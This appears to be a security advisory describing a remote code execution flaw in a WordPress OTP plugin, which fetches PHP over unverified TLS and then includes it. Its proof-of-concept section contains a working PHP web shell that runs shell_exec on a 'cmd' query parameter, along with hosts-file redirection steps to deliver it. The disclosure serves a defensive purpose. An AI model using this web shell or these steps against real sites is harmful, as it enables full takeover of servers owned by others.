Remote Code Execution via insecure remote code download and runtime inclusion

Email OTP Authenticator – Remote Code Execution via insecure remote code download and runtime inclusion

• Affected plugin: Email OTP Authenticator
• Affected versions: all so far
• Component: email-otp-authenticator.php (“Addon+Prime service” / Extreme demo path)
• CWE: CWE-494 Download of Code Without Integrity Check; CWE-295 Improper Certificate Validation; CWE-829 Inclusion of Functionality from Untrusted Control Sphere
• CVSS v3.1: 8.8 High (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)

Summary
The plugin downloads a PHP file from a remote server with SSL verification disabled and then includes it at runtime. Any network attacker (MITM/DNS hijack) or compromise of the remote host can deliver arbitrary PHP that executes with the WordPress PHP process’ privileges.

Technical details

• In the “Addon+Prime service” flow, when the option emailotpauthn_extremedemo is enabled, the plugin fetches and writes a remote PHP payload and then includes it:
• Disables TLS certificate validation and downloads remote code:
• CURLOPT_SSL_VERIFYPEER set to 0
• Writes remote content into the plugin folder
• Includes the resulting PHP file via include(…), executing it in-process

Even more detailed:

curl_setopt($chfc, CURLOPT_SSL_VERIFYPEER, 0);
$Classfilecontent = curl_exec($chfc);
…
$Classfilecontent = file_put_contents($classfilepath, $Classfilecontent, LOCK_EX);

$classfile = emailotpauthn_extremedemo_setup($classfile);
…
include(sprintf(“%s/lib/%s”, dirname(FILE), $classfile));

Impact

• Remote Code Execution (RCE) in the context of the web server process. Full compromise of the WordPress site and potentially the underlying server account.

Prerequisites

• Admin toggles the “Activate Addon+Prime Service” option (in the plugin’s settings UI), or the option is otherwise set to 1. But it is expected most users will have this enabled.
• Attacker can influence the network path (MITM/DNS) or the remote update endpoint is compromised.

Proof of concept:

 Point the plugin’s remote host to your test server

• Edit /etc/hosts on the WP server:
• Add: 127.0.0.1 eotpa.cs7.in
• Start a simple HTTP server on port 80 serving a malicious PHP file at /api_server/emailotpauthn-class-extreme_demo.txt:
• Directory structure:
• ./api_server/emailotpauthn-class-extreme_demo.txt
• Minimal payload (must be > 11000 bytes; pad with comments). Example file head:php    <?php    /*    pad pad pad … (repeat to exceed 11000 bytes)    */    add_action(‘init’, function () {      if (isset($_GET[‘cmd’])) {        echo ‘<pre>’ . shell_exec($_GET[‘cmd’]) . ‘</pre>’;        exit;      }    });

• Serve it:
• python3 -m http.server 80

2) Enable the vulnerable flow

• In WP admin, visit: Settings → Email OTP Router → check “Activate Addon+Prime Service” → Save.
• This sets emailotpauthn_extremedemo = 1, causing the plugin to fetch the remote file on next load.

3) Trigger the download and inclusion

• Reload any admin page (or the site). The plugin will:
• Download emailotpauthn-class-extreme_demo.txt from eotpa.cs7.in (now your server)
• Write it under lib/emailotpauthn-class-extreme_demo.php
• Include it at runtime

4) Verify RCE (lab only)

• Visit http://your-site/?cmd=id (or any route that executes WordPress) and observe output of the injected handler.

Remediation

• Remove remote code download/execution entirely. Do not fetch or write executable PHP from external hosts.
• If remote updates are required, use WordPress’ signed update mechanisms only.
• Never disable TLS verification; validate server certificates and pin versions/hashes if applicable.